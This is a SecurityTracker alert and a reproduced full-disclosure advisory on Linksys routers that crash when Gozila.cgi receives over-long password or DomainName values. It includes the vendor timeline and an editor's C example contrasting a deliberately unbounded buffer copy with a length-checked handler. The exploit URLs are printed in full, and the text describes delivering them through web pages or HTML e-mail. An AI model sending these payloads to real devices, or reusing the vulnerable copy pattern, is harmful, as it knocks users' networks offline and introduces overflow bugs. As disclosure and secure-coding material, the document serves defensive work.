Linksys Routers Can Be Crashed With Specially Crafted sysPasswd and sysPasswdConfirm or DomainName Values
SecurityTracker Alert ID: 1010382
SecurityTracker URL: http://securitytracker.com/id?1010382
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 3 2004
Impact: Denial of service via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): Firmware 1.45.7; Models BEFSR41, BEFSR41 v3, BEFSRU31, BEFSR11, BEFSX41, BEFSR81 v2/v3, BEFW11S4 v3, and BEFW11S4 v4
Description: A denial of service vulnerability was reported in several Linksys routers. A remote user can cause the device to crash.
b0f (Alan McCaig) reported that a remote user on the internal network can send a string of about 150 characters to both the sysPasswd and sysPasswdConfirm fields of the 'Gozila.cgi' script to cause the device to crash.
It is also reported that a remote user can send a string of approximately 350 characters to the DomainName field of the 'Gozila.cgi' script to cause the device to crash.
Some demonstration exploit URLs are provided (150 'A' characters in each password field, 350 in the DomainName field):
http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&UPnP_Work=1&FactoryDefaults=0
http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1
If either of these types of URLs is loaded by an administrator, the device will require a hard reset to the factory settings in order to return to normal operations, the report said. Because the requests are plain GETs, the report notes they can be delivered indirectly, via a web page or HTML e-mail viewed by someone on the LAN.
The following models are reported to be affected: BEFSR41, BEFSR41 v3, BEFSRU31, BEFSR11, BEFSX41, BEFSR81 v2/v3, BEFW11S4 v3, and BEFW11S4 v4.
The vendor was reportedly notified on December 1, 2003.
Impact: A remote user on the internal network can cause the target device to crash.
Solution: The vendor has reportedly issued a firmware update for BEFSR41 v3, BEFSX41, BEFW11S4 v3, and BEFW11S4 v4, some of which have been available since March 2004. The vendor is reportedly working on a fix for BEFSR81 v2/v3. The report states that the original BEFSR41 (firmware 1.45.7), for which the advisory was first written, remained unpatched at the time of publication.
The updates are available at:
http://www.linksys.com/download/firmware.asp?fwid=3
Vendor URL: www.linksys.com/
Cause: Exception handling error
Reported By: b0f <b0fnet@yahoo.com>
Message History:
None.
Source Message Contents
Date: Thu, 3 Jun 2004 01:31:06 -0700 (PDT)
From: b0f <b0fnet@yahoo.com>
Subject: [Full-Disclosure] DoS vuln in various versions of Linksys routers.
Denial of Service Vulnerability in Linksys BEFSR41 - Router vuln was identified and tested on.
Linksys BEFSR41 v3
Linksys BEFSRU31
Linksys BEFSR11
Linksys BEFSX41
Linksys BEFSR81 v2/v3
Linksys BEFW11S4 v3
Linksys BEFW11S4 v4
Available from www.linksys.com
October 19, 2003 (Revised November 10, 2003)
Released Date: 3rd June 2004
NOTE: THIS ADVISORY WAS ORIGINALLY WRITTEN FOR THE Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch
I. BACKGROUND
Linksys Group Inc.'s EtherFast Cable/DSL Router with 4-Port Switch "is the perfect option to connect multiple PCs to a high-speed Broadband Internet connection or to an Ethernet back-bone. Allowing up to 253 users, the built-in NAT technology acts as a firewall protecting your internal network." More information about it is available at http://www.linksys.com/products/product.asp?prid=20&grid=23
II. DESCRIPTION
It is possible for a remote/local attacker to crash the Linksys router and leave it in a state that it can't be accessed even after reboot due to an invalid password. An attacker could set up a web page or send an HTML email to someone inside the LAN to indirectly send commands to the router. An attacker could specify a URL that results in denial of service. The DoS occurs when 2 long strings are sent to the sysPasswd and sysPasswdConfirm parameters on the Gozila.cgi script; about 150 characters to each parameter seems to work fine. If an attacker can get the admin of the router to view a link or go to a webpage that links to such a link as this:
http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&UPnP_Work=1&FactoryDefaults=0
The router will drop all internet connections, making the internet inaccessible from the LAN even if the router is powered off and back on. It also seems to change the password in such a way that the admin can't log back into the router, and the only way to solve it is by pressing the factory reset button on the front of the router, which will then reset all previously stored settings and reset the password back to the factory default 'admin'. The router would then need to be set back up again from scratch.
REVISED NOVEMBER 10, 2003
On November 10 2003 I found another overflow in the Linksys router which is a similar attack method to the first vuln in this advisory. The DoS occurs in this attack when a long string of about 350 characters is passed to the 'DomainName' parameter of the Gozila.cgi script. An example of this attack would be to get the admin of a router to visit a link like this:
http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1
This would cause the router to crash, and the factory reset button on the front of the router would need to be pressed to restore it back to normal working order.
III. ANALYSIS
Exploitation may be particularly dangerous, especially if the router's remote management capability is enabled. It may also be easily exploited by fooling an admin of the router into clicking a link he/she thinks is valid. This is probably vuln in older versions of the firmware.
IV. DETECTION
This vulnerability affects the BEFSR41 EtherFast Cable/DSL router with the latest firmware version 1.45.7. I also tested version 1.44.2z which is also vuln, so probably all other versions below this are also vuln. It may also be possible that other versions of Linksys routers are vuln to this attack if they use the same type of management. I'm unable to confirm any other models that are vuln to this attack. The Linksys BEFSRU31 and BEFSR11 use the same version of firmware as the BEFSR41 so they are probably vuln.
NOTE ADDED June 3rd 2004:
The vendor confirmed this vuln in all versions stated at the start of this advisory.
V. RECOVERY
Pressing the reset button on the front of the router and setting it back up from scratch should restore normal functionality to the router.
VI. WORKAROUND
Don't click untrusted links.
VII. VENDOR
19 Oct 2003: First vuln discovered.
10 Nov 2003: Second vuln discovered.
01 Dec 2003: Vendor contacted via security@linksys.com
01 Dec 2003: Response received from jay.price@linksys.com
10 Dec 2003: Issue has been turned over to project manager andreas.bang@linksys.com
17 Dec 2003: I was sent a beta release of the new firmware which fixed the vuln but had a bug where the logging function wouldn't work.
22 Dec 2003: andreas.bang@linksys.com has now moved office; now to contact anbang@cisco.com
29 Jan 2004: Was told patches would be up in the next week.
29 Feb 2004: They said there was a problem with the code, still no patches.
24 Mar 2004: Received an email about patches saying:
BEFSR41 v3 (post on by 3/31)
BEFSX41 (posted)
BEFSR81 v2/v3 (in progress)
BEFW11S4 v3 (post by 3/31)
BEFW11S4 v4 (posted)
02 Jun 2004: Advisory released to public; still no patch for the Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch
http://www.linksys.com/download/firmware.asp?fwid=3
The version this advisory was first written for still remains vuln to date.
b0f (Alan McCaig)
b0fnet@yahoo.com
www.b0f.net
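Editor's added example, not Linksys code and not from the reporter: the Gozila.cgi source is not public, so the handler below is a hypothetical CGI routine that shows the bug class behind both the 150-character sysPasswd/sysPasswdConfirm case and the 350-character DomainName case described in the Description above and in section II of the advisory. The parameter names are the advisory's; the buffer limits (32 and 64 bytes), the status codes and the helper names are assumptions. It places an unbounded copy of a query value into a fixed stack buffer (the crash) beside the length-checked form that refuses over-long input before anything is written.

```c
/* Added illustration of the advisory's bug class; hypothetical, not Linksys
 * firmware. Parameter names from the advisory; sizes and names assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PASSWD_MAX 32   /* assumed policy limits; real firmware values unknown */
#define DOMAIN_MAX 64

typedef enum {
    GOZILA_OK = 0,
    GOZILA_MISSING = -1,
    GOZILA_TOO_LONG = -2,
    GOZILA_MISMATCH = -3
} gozila_status;

/* Locate "name=" in a raw query string. Returns a pointer to the value and its
 * length (up to the next '&' or end of string), or NULL if absent. No
 * percent-decoding: enough for the advisory's all-'A' payloads. */
static const char *query_param(const char *query, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = query;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *e = strchr(v, '&');
            *len = e ? (size_t)(e - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    return NULL;
}

/* VULNERABLE pattern: the value is copied into a fixed stack buffer with no
 * bound. A 150-byte sysPasswd overruns pw[] and corrupts the stack, the kind
 * of crash the advisory reports. Shown for contrast; never call it with
 * untrusted input. */
int set_password_unchecked(const char *query)
{
    char pw[PASSWD_MAX + 1];
    size_t len;
    const char *v = query_param(query, "sysPasswd", &len);
    if (!v) return GOZILA_MISSING;
    memcpy(pw, v, len);          /* no check that len <= PASSWD_MAX */
    pw[len] = '\0';
    return GOZILA_OK;
}

/* HARDENED helper: copy only if the value fits both the policy limit and the
 * destination; otherwise refuse before anything touches the stack buffer or
 * stored configuration, so a bad request cannot leave the device unusable. */
static gozila_status copy_param_bounded(const char *query, const char *name,
                                        size_t max_len, char *out, size_t outsz)
{
    size_t len;
    const char *v = query_param(query, name, &len);
    if (!v) return GOZILA_MISSING;
    if (len > max_len || len >= outsz) return GOZILA_TOO_LONG;
    memcpy(out, v, len);
    out[len] = '\0';
    return GOZILA_OK;
}

/* Password change: both fields bounded and required to match before commit. */
gozila_status set_password_checked(const char *query)
{
    char pw[PASSWD_MAX + 1], confirm[PASSWD_MAX + 1];
    gozila_status r = copy_param_bounded(query, "sysPasswd", PASSWD_MAX, pw, sizeof pw);
    if (r != GOZILA_OK) return r;
    r = copy_param_bounded(query, "sysPasswdConfirm", PASSWD_MAX, confirm, sizeof confirm);
    if (r != GOZILA_OK) return r;
    if (strcmp(pw, confirm) != 0) return GOZILA_MISMATCH;
    /* commit pw to configuration here; it is known to fit */
    return GOZILA_OK;
}

/* Same treatment for the DomainName field from the second payload. */
gozila_status set_domain_checked(const char *query)
{
    char domain[DOMAIN_MAX + 1];
    return copy_param_bounded(query, "DomainName", DOMAIN_MAX, domain, sizeof domain);
}

/* Build an advisory-style query: "name=" + n x 'A', then "&rest" if given.
 * Caller frees. Reproduces the 150- and 350-byte cases offline. */
char *make_payload(const char *name, size_t n, const char *rest)
{
    size_t nlen = strlen(name), rlen = rest ? strlen(rest) + 1 : 0;
    char *s = malloc(nlen + 1 + n + rlen + 1);
    if (!s) return NULL;
    memcpy(s, name, nlen);
    s[nlen] = '=';
    memset(s + nlen + 1, 'A', n);
    if (rest) { s[nlen + 1 + n] = '&'; memcpy(s + nlen + 2 + n, rest, rlen - 1); }
    s[nlen + 1 + n + rlen] = '\0';
    return s;
}

int main(void)
{
    char *q = make_payload("sysPasswd", 150, "sysPasswdConfirm=AAAA");
    printf("150-byte sysPasswd, checked handler: %d (TOO_LONG is %d)\n",
           set_password_checked(q), GOZILA_TOO_LONG);
    free(q);
    q = make_payload("DomainName", 350, "WANConnectionSel=0");
    printf("350-byte DomainName, checked handler: %d\n", set_domain_checked(q));
    free(q);
    return 0;
}
```

The length check removes the crash, but it does not address the delivery vector the advisory points out: Gozila.cgi applies configuration changes on a plain GET, so any page or HTML e-mail an administrator views from the LAN (or from the Internet, if remote management is on) can submit them. A complete fix also needs the change to be refused unless it arrives as an authenticated POST that carries a token the attacker's page cannot know.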